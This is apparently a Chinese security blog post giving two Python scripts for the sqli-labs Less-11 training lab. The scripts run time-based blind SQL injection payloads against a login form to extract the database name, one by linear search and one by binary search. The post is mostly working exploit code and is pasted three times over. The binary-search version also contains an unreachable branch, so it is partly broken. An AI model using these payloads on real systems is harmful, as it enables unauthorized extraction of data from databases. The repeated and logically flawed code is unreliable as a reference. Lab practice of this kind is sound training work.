当前位置
请选择城市
  • 热门
  • ABCDEFG
  • HIJKL
  • MNOPQRST
  • WXYZ
打造高能级科技创新平台
免费发布任务
免费发布任务
首页 > 藏经阁
python编写sqli-labs11关
网络安全  /  2024-12-19  /  14773浏览

关于sql时间盲注爆破数据库名

未使用二分法

import requestsimport datetime
headers = {
        "User - Agent": "Mozilla / 5.0(Windows NT 6.1;Win64;x64;rv: 82.0) Gecko / 20100101Firefox / 82.0"
    }def main():
    database = ""
    for n in range(1,9):
        for i in range(65,122):

            data = {
                "uname" : "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, i),
                "passwd" : "11"

            }
            url = "http://192.168.0.100/sqli-labs-master/Less-11/"
            print(data)
            res = requests.post(url=url, data=data)
            if "admin" not in res.text:
                print(chr(i))
                database += str(chr(i))
                break
    print(database)if __name__ == "__main__":
    starttime = datetime.datetime.now()
    main()
    endtime = datetime.datetime.now()
    print(endtime-starttime)

在这里插入图片描述

使用二分法

import requestsimport datetime#基于时间盲注使用ascii()函数#1.编写盲注函数#2.编写二分法函数#3.编写ascii码转换函数def func():
    global f, g, h
    length_ascii = int(122-65)
    e = int(length_ascii/2)    #取中间数值28
    f = 65 + int(e)  #65和122中间的值93
    
    g = int(65 + 3/2*int(e)) #93+14   107
    h = int(65 + 1/2*int(e))  #65+14   79def injection_datebase():
    database = ""
    headers = {
        "User - Agent": "Mozilla / 5.0(Windows NT 6.1;Win64;x64;rv: 82.0) Gecko / 20100101Firefox / 82.0"
    }
    url = "http://192.168.0.100/sqli-labs-master/Less-11/"
    for n in range(1,9):
        data = {
                "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, str(f)),#判断是否大于93
                "passwd": "11"
            }
        url = "http://192.168.0.100/sqli-labs-master/Less-11/"
        res = requests.post(url=url,data=data)
        if "admin" in res.text:              #ascii码大于中间值93
            res = requests.post(url="http://192.168.0.100/sqli-labs-master/Less-11/", data={
                "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n,str(g)),#判断是否大于107
                "passwd": "11"})
            if "admin" in res.text:
                for i in range(g,122):    #107-122
                    data = {
                        "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, i),
                        "passwd": "11"

                    }
                    url = "http://192.168.0.100/sqli-labs-master/Less-11/"
                    print(data)
                    res = requests.post(url=url, data=data)
                    if "admin" not in res.text:
                        print(chr(i))
                        database += str(chr(i))
                        break
            elif "admin" not in res.text:
                for i in range(f, g):  #93-107
                    data = {
                        "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, i),
                        "passwd": "11"

                    }
                    url = "http://192.168.0.100/sqli-labs-master/Less-11/"
                    print(data)
                    res = requests.post(url=url, data=data)
                    if "admin" not in res.text:
                        print(chr(i))
                        database += str(chr(i))
                        break

        elif "admin" not in res.text:       #ascii码小于93
            if "admin" in res.text:  #
                res = requests.post(url="http://192.168.0.100/sqli-labs-master/Less-11/", data={
                    "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, h),
                    # 判断是否大于79
                    "passwd": "11"})
                if "admin" in res.text:     #大于79
                    for i in range(h, f):  # 79-93
                        data = {
                            "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, i),
                            "passwd": "11"

                        }
                        url = "http://192.168.0.100/sqli-labs-master/Less-11/"
                        print(data)
                        res = requests.post(url=url, data=data)
                        if "admin" not in res.text:
                            print(chr(i))
                            database += str(chr(i))
                            break
                elif "admin" not in res.text:   #小于79
                    for i in range(65, h):  # 65-79
                        data = {
                            "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, i),
                            "passwd": "11"

                        }
                        url = "http://192.168.0.100/sqli-labs-master/Less-11/"
                        print(data)
                        res = requests.post(url=url, data=data)
                        if "admin" not in res.text:
                            print(chr(i))
                            database += str(chr(i))
                            break
    print(database)def main():

    func()
    injection_datebase()if __name__ == "__main__":
    starttime = datetime.datetime.now()
    main()
    endtime = datetime.datetime.now()
    print(endtime-starttime)

关于sql时间盲注爆破数据库名

未使用二分法

import requestsimport datetime
headers = {
        "User - Agent": "Mozilla / 5.0(Windows NT 6.1;Win64;x64;rv: 82.0) Gecko / 20100101Firefox / 82.0"
    }def main():
    database = ""
    for n in range(1,9):
        for i in range(65,122):

            data = {
                "uname" : "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, i),
                "passwd" : "11"

            }
            url = "http://192.168.0.100/sqli-labs-master/Less-11/"
            print(data)
            res = requests.post(url=url, data=data)
            if "admin" not in res.text:
                print(chr(i))
                database += str(chr(i))
                break
    print(database)if __name__ == "__main__":
    starttime = datetime.datetime.now()
    main()
    endtime = datetime.datetime.now()
    print(endtime-starttime)

在这里插入图片描述

使用二分法

import requestsimport datetime#基于时间盲注使用ascii()函数#1.编写盲注函数#2.编写二分法函数#3.编写ascii码转换函数def func():
    global f, g, h
    length_ascii = int(122-65)
    e = int(length_ascii/2)    #取中间数值28
    f = 65 + int(e)  #65和122中间的值93
    
    g = int(65 + 3/2*int(e)) #93+14   107
    h = int(65 + 1/2*int(e))  #65+14   79def injection_datebase():
    database = ""
    headers = {
        "User - Agent": "Mozilla / 5.0(Windows NT 6.1;Win64;x64;rv: 82.0) Gecko / 20100101Firefox / 82.0"
    }
    url = "http://192.168.0.100/sqli-labs-master/Less-11/"
    for n in range(1,9):
        data = {
                "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, str(f)),#判断是否大于93
                "passwd": "11"
            }
        url = "http://192.168.0.100/sqli-labs-master/Less-11/"
        res = requests.post(url=url,data=data)
        if "admin" in res.text:              #ascii码大于中间值93
            res = requests.post(url="http://192.168.0.100/sqli-labs-master/Less-11/", data={
                "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n,str(g)),#判断是否大于107
                "passwd": "11"})
            if "admin" in res.text:
                for i in range(g,122):    #107-122
                    data = {
                        "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, i),
                        "passwd": "11"

                    }
                    url = "http://192.168.0.100/sqli-labs-master/Less-11/"
                    print(data)
                    res = requests.post(url=url, data=data)
                    if "admin" not in res.text:
                        print(chr(i))
                        database += str(chr(i))
                        break
            elif "admin" not in res.text:
                for i in range(f, g):  #93-107
                    data = {
                        "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, i),
                        "passwd": "11"

                    }
                    url = "http://192.168.0.100/sqli-labs-master/Less-11/"
                    print(data)
                    res = requests.post(url=url, data=data)
                    if "admin" not in res.text:
                        print(chr(i))
                        database += str(chr(i))
                        break

        elif "admin" not in res.text:       #ascii码小于93
            if "admin" in res.text:  #
                res = requests.post(url="http://192.168.0.100/sqli-labs-master/Less-11/", data={
                    "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, h),
                    # 判断是否大于79
                    "passwd": "11"})
                if "admin" in res.text:     #大于79
                    for i in range(h, f):  # 79-93
                        data = {
                            "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, i),
                            "passwd": "11"

                        }
                        url = "http://192.168.0.100/sqli-labs-master/Less-11/"
                        print(data)
                        res = requests.post(url=url, data=data)
                        if "admin" not in res.text:
                            print(chr(i))
                            database += str(chr(i))
                            break
                elif "admin" not in res.text:   #小于79
                    for i in range(65, h):  # 65-79
                        data = {
                            "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, i),
                            "passwd": "11"

                        }
                        url = "http://192.168.0.100/sqli-labs-master/Less-11/"
                        print(data)
                        res = requests.post(url=url, data=data)
                        if "admin" not in res.text:
                            print(chr(i))
                            database += str(chr(i))
                            break
    print(database)def main():

    func()
    injection_datebase()if __name__ == "__main__":
    starttime = datetime.datetime.now()
    main()
    endtime = datetime.datetime.now()
    print(endtime-starttime)

关于sql时间盲注爆破数据库名

未使用二分法

import requestsimport datetime
headers = {
        "User - Agent": "Mozilla / 5.0(Windows NT 6.1;Win64;x64;rv: 82.0) Gecko / 20100101Firefox / 82.0"
    }def main():
    database = ""
    for n in range(1,9):
        for i in range(65,122):

            data = {
                "uname" : "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, i),
                "passwd" : "11"

            }
            url = "http://192.168.0.100/sqli-labs-master/Less-11/"
            print(data)
            res = requests.post(url=url, data=data)
            if "admin" not in res.text:
                print(chr(i))
                database += str(chr(i))
                break
    print(database)if __name__ == "__main__":
    starttime = datetime.datetime.now()
    main()
    endtime = datetime.datetime.now()
    print(endtime-starttime)

在这里插入图片描述

使用二分法

import requestsimport datetime#基于时间盲注使用ascii()函数#1.编写盲注函数#2.编写二分法函数#3.编写ascii码转换函数def func():
    global f, g, h
    length_ascii = int(122-65)
    e = int(length_ascii/2)    #取中间数值28
    f = 65 + int(e)  #65和122中间的值93
    
    g = int(65 + 3/2*int(e)) #93+14   107
    h = int(65 + 1/2*int(e))  #65+14   79def injection_datebase():
    database = ""
    headers = {
        "User - Agent": "Mozilla / 5.0(Windows NT 6.1;Win64;x64;rv: 82.0) Gecko / 20100101Firefox / 82.0"
    }
    url = "http://192.168.0.100/sqli-labs-master/Less-11/"
    for n in range(1,9):
        data = {
                "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, str(f)),#判断是否大于93
                "passwd": "11"
            }
        url = "http://192.168.0.100/sqli-labs-master/Less-11/"
        res = requests.post(url=url,data=data)
        if "admin" in res.text:              #ascii码大于中间值93
            res = requests.post(url="http://192.168.0.100/sqli-labs-master/Less-11/", data={
                "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n,str(g)),#判断是否大于107
                "passwd": "11"})
            if "admin" in res.text:
                for i in range(g,122):    #107-122
                    data = {
                        "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, i),
                        "passwd": "11"

                    }
                    url = "http://192.168.0.100/sqli-labs-master/Less-11/"
                    print(data)
                    res = requests.post(url=url, data=data)
                    if "admin" not in res.text:
                        print(chr(i))
                        database += str(chr(i))
                        break
            elif "admin" not in res.text:
                for i in range(f, g):  #93-107
                    data = {
                        "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, i),
                        "passwd": "11"

                    }
                    url = "http://192.168.0.100/sqli-labs-master/Less-11/"
                    print(data)
                    res = requests.post(url=url, data=data)
                    if "admin" not in res.text:
                        print(chr(i))
                        database += str(chr(i))
                        break

        elif "admin" not in res.text:       #ascii码小于93
            if "admin" in res.text:  #
                res = requests.post(url="http://192.168.0.100/sqli-labs-master/Less-11/", data={
                    "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, h),
                    # 判断是否大于79
                    "passwd": "11"})
                if "admin" in res.text:     #大于79
                    for i in range(h, f):  # 79-93
                        data = {
                            "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, i),
                            "passwd": "11"

                        }
                        url = "http://192.168.0.100/sqli-labs-master/Less-11/"
                        print(data)
                        res = requests.post(url=url, data=data)
                        if "admin" not in res.text:
                            print(chr(i))
                            database += str(chr(i))
                            break
                elif "admin" not in res.text:   #小于79
                    for i in range(65, h):  # 65-79
                        data = {
                            "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, i),
                            "passwd": "11"

                        }
                        url = "http://192.168.0.100/sqli-labs-master/Less-11/"
                        print(data)
                        res = requests.post(url=url, data=data)
                        if "admin" not in res.text:
                            print(chr(i))
                            database += str(chr(i))
                            break
    print(database)def main():

    func()
    injection_datebase()if __name__ == "__main__":
    starttime = datetime.datetime.now()
    main()
    endtime = datetime.datetime.now()
    print(endtime-starttime)




点赞 0
收藏 0
我要打赏
热点文章
什么是网络安全等级保护
什么是网络安全等级保护
19520阅读
5评论
python编写sqli-labs11关
python编写sqli-labs11关
14774阅读
0评论
SQLI-Less-11-15
SQLI-Less-11-15
14745阅读
0评论
sqli-labs16-20
sqli-labs16-20
14615阅读
0评论
sqli-labs26-32
sqli-labs26-32
14410阅读
0评论
评论0
2000
发布评论
首页 需求大厅 大牛在凤雏 创业基地 云员工 藏经阁 软考试题 CTF挑战赛 白帽服务 入驻院校 企业服务
咨询热线:
09962028123
联系地址
新疆巴州库尔勒市豪景大厦
E-mail
fengchuyunwei@163.com
友情链接:
新疆科技学院官网 山石网科官网 安恒信息官网 网御星云官网 绿盟科技官网 深信服官网 奇安信官网 启明星辰官网 天融信官网 威努特官网 亚信安全官网 360数字安全官网

© 2023-2024 凤雏运维 版权所有,并保留所有权利   新ICP备2021001141号-2

首页
专属客服
发布任务
意见反馈
需求大厅
我的